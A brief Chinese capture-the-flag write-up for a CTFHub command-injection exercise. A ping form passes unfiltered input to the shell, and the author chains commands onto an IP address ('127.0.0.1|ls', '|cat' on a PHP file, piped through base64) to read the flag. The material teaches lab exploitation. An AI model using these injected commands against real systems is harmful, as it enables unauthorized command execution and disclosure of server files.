CTFHUB-技能树-Web题-RCE(远程代码执行)-远程包含-命令注入
ping -c 4 192.168.1.1表示ping4次
查看代码,需要输入ip地址
尝试输入127.0.01,返回了ping包情况
由于没有过滤,直接拼接cmd命令查看即可
127.0.0.1|ls
127.0.0.1|cat 25653369915628.php
提交了[1]没有东西
可以构造(也可以直接查看源代码)
127.0.0.1|cat 25653369915628.php|base64
对base64进行解密